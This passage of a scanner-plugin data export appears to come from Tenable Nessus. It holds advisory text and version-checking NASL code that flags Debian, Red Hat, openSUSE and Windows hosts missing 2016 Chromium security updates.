CVE-2016-5181\n A cross-site scripting issue was discovered.\n\n - CVE-2016-5182\n Giwan Go discovered a heap overflow issue.\n\n - CVE-2016-5183\n A use-after-free issue was discovered in the pdfium\n library.\n\n - CVE-2016-5184\n Another use-after-free issue was discovered in the\n pdfium library.\n\n - CVE-2016-5185\n cloudfuzzer discovered a use-after-free issue in\n Blink/Webkit.\n\n - CVE-2016-5186\n Abdulrahman Alqabandi discovered an out-of-bounds read\n issue in the developer tools.\n\n - CVE-2016-5187\n Luan Herrera discovered a URL spoofing issue.\n\n - CVE-2016-5188\n Luan Herrera discovered that some drop down menus can be\n used to hide parts of the user interface.\n\n - CVE-2016-5189\n xisigr discovered a URL spoofing issue.\n\n - CVE-2016-5190\n Atte Kettunen discovered a use-after-free issue.\n\n - CVE-2016-5191\n Gareth Hughes discovered a cross-site scripting issue.\n\n - CVE-2016-5192\n haojunhou@gmail.com discovered a same-origin bypass.\n\n - CVE-2016-5193\n Yuyang Zhou discovered a way to pop open a new window.\n\n - CVE-2016-5194\n The chrome development team found and fixed various\n issues during internal auditing.\n\n - CVE-2016-5198\n Tencent Keen Security Lab discovered an out-of-bounds\n memory access issue in the v8 JavaScript library.\n\n - CVE-2016-5199\n A heap corruption issue was discovered in the ffmpeg\n library.\n\n - CVE-2016-5200\n Choongwoo Han discovered an out-of-bounds memory access\n issue in the v8 JavaScript library.\n\n - CVE-2016-5201\n Rob Wu discovered an information leak.\n\n - CVE-2016-5202\n The chrome development team found and fixed various\n issues during internal auditing.\n\n - CVE-2016-5203\n A use-after-free issue was discovered in the pdfium\n library.\n\n - CVE-2016-5204\n Mariusz Mlynski discovered a cross-site scripting issue\n in SVG image handling.\n\n - CVE-2016-5205\n A cross-site scripting issue was discovered.\n\n - CVE-2016-5206\n Rob Wu discovered a same-origin bypass in the pdfium\n library.\n\n - CVE-2016-5207\n Mariusz Mlynski discovered a cross-site scripting issue.\n\n - CVE-2016-5208\n Mariusz Mlynski discovered another cross-site scripting\n issue.\n\n - CVE-2016-5209\n Giwan Go discovered an out-of-bounds write issue in\n Blink/Webkit.\n\n - CVE-2016-5210\n Ke Liu discovered an out-of-bounds write in the pdfium\n library.\n\n - CVE-2016-5211\n A use-after-free issue was discovered in the pdfium\n library.\n\n - CVE-2016-5212\n Khalil Zhani discovered an information disclosure issue\n in the developer tools.\n\n - CVE-2016-5213\n Khalil Zhani discovered a use-after-free issue in the v8\n JavaScript library.\n\n - CVE-2016-5214\n Jonathan Birch discovered a file download protection\n bypass.\n\n - CVE-2016-5215\n Looben Yang discovered a use-after-free issue.\n\n - CVE-2016-5216\n A use-after-free issue was discovered in the pdfium\n library.\n\n - CVE-2016-5217\n Rob Wu discovered a condition where data was not\n validated by the pdfium library.\n\n - CVE-2016-5218\n Abdulrahman Alqabandi discovered a URL spoofing issue.\n\n - CVE-2016-5219\n Rob Wu discovered a use-after-free issue in the v8\n JavaScript library.\n\n - CVE-2016-5220\n Rob Wu discovered a way to access files on the local\n system.\n\n - CVE-2016-5221\n Tim Becker discovered an integer overflow issue in the\n angle library.\n\n - CVE-2016-5222\n xisigr discovered a URL spoofing issue.\n\n - CVE-2016-5223\n Hwiwon Lee discovered an integer overflow issue in the\n pdfium library.\n\n - CVE-2016-5224\n Roeland Krak discovered a same-origin bypass in SVG\n image handling.\n\n - CVE-2016-5225\n Scott Helme discovered a Content Security Protection\n bypass.\n\n - CVE-2016-5226\n Jun Kokatsu discovered a cross-scripting issue.\n\n - CVE-2016-9650\n Jakub Zoczek discovered a Content Security Protection\n information disclosure.\n\n - CVE-2016-9651\n Guang Gong discovered a way to access private data in\n the v8 JavaScript library.\n\n - CVE-2016-9652\n The chrome development team found and fixed various\n issues during internal auditing.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5181\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5182\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5183\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5184\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5185\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5187\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5188\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5189\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5190\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5191\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5192\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5193\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5194\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5198\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5199\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5200\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5201\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5202\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5203\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5204\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5205\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5206\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5207\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5208\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5209\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5211\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5212\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5213\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5214\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5215\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5216\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5217\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5218\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5219\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5220\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5221\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5222\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5224\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5225\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-5226\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-9650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-9651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2016-9652\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/jessie/chromium-browser\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2016/dsa-3731\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 55.0.2883.75-1~deb8u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"chromedriver\", reference:\"55.0.2883.75-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium\", reference:\"55.0.2883.75-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-dbg\", reference:\"55.0.2883.75-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-inspector\", reference:\"55.0.2883.75-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-l10n\", reference:\"55.0.2883.75-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:10:15", "description": "The version of Google Chrome installed on the remote Windows host is prior to 54.0.2840.99. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists in the FFmpeg component due to an integer overflow condition in the mov_read_keys() function in mov.c caused by improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a website containing specially crafted content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-5199)\n\n - A denial of service vulnerability exists in the V8 component due to an out-of-bounds read error that is triggered when handling 'Math.sign'. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a website containing specially crafted content, to crash the browser or disclose memory contents.\n (CVE-2016-5200)\n\n - An information disclosure vulnerability exists due to a flaw in the expose() function in utils.js. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a website containing specially crafted content, to disclose sensitive internal class information. (CVE-2016-5201)\n\n - An unspecified vulnerability exists in the PruneExpiredDevices() function in dial_registry.cc that allows an unauthenticated, remote attacker to have an unspecified impact. (CVE-2016-5202)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2016-11-10T00:00:00", "type": "nessus", "title": "Google Chrome < 54.0.2840.99 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_54_0_2840_99.NASL", "href": "https://www.tenable.com/plugins/nessus/94676", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94676);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-5199\",\n \"CVE-2016-5200\",\n \"CVE-2016-5201\",\n \"CVE-2016-5202\"\n );\n script_bugtraq_id(94196);\n\n script_name(english:\"Google Chrome < 54.0.2840.99 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 54.0.2840.99. It is, therefore, affected by the following\nvulnerabilities :\n\n - A remote code execution vulnerability exists in the\n FFmpeg component due to an integer overflow condition in\n the mov_read_keys() function in mov.c caused by improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a website containing specially crafted content,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2016-5199)\n\n - A denial of service vulnerability exists in the V8\n component due to an out-of-bounds read error that is\n triggered when handling 'Math.sign'. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a website containing specially crafted content,\n to crash the browser or disclose memory contents.\n (CVE-2016-5200)\n\n - An information disclosure vulnerability exists due to a\n flaw in the expose() function in utils.js. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a website containing\n specially crafted content, to disclose sensitive\n internal class information. (CVE-2016-5201)\n\n - An unspecified vulnerability exists in the\n PruneExpiredDevices() function in dial_registry.cc that\n allows an unauthenticated, remote attacker to have an\n unspecified impact. (CVE-2016-5202)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://googlechromereleases.blogspot.com/2016/11/stable-channel-update-for-desktop_9.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bdb7f5cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 54.0.2840.99 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5202\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'54.0.2840.99', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:18", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 54.0.2840.100.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. (CVE-2016-5199, CVE-2016-5200, CVE-2016-5202, CVE-2016-5201)", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2016-11-15T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2016:2718)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2016-2718.NASL", "href": "https://www.tenable.com/plugins/nessus/94897", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2718. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94897);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\");\n script_xref(name:\"RHSA\", value:\"2016:2718\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2016:2718)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 54.0.2840.100.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Chromium\nto crash, execute arbitrary code, or disclose sensitive information\nwhen visited by the victim. (CVE-2016-5199, CVE-2016-5200,\nCVE-2016-5202, CVE-2016-5201)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5199\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5200\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5201\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5202\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:2718\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-54.0.2840.100-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-54.0.2840.100-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-54.0.2840.100-1.el6\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-54.0.2840.100-1.el6\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:30", "description": "This update to Chromium 54.0.2840.100 fixes the following vulnerabilities :\n\n - CVE-2016-5199: Heap corruption in FFmpeg (boo#1009892)\n\n - CVE-2016-5200: out of bounds memory access in v8 (boo#1009893)\n\n - CVE-2016-5201: info leak in extensions (boo#1009894)\n\n - CVE-2016-5202: various fixes from internal audits (boo#1009895)", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2016-11-15T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2016-1292)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:42.1", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2016-1292.NASL", "href": "https://www.tenable.com/plugins/nessus/94894", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1292.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94894);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2016-1292)\");\n script_summary(english:\"Check for the openSUSE-2016-1292 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to Chromium 54.0.2840.100 fixes the following\nvulnerabilities :\n\n - CVE-2016-5199: Heap corruption in FFmpeg (boo#1009892)\n\n - CVE-2016-5200: out of bounds memory access in v8\n (boo#1009893)\n\n - CVE-2016-5201: info leak in extensions (boo#1009894)\n\n - CVE-2016-5202: various fixes from internal audits\n (boo#1009895)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1009892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1009893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1009894\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1009895\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", 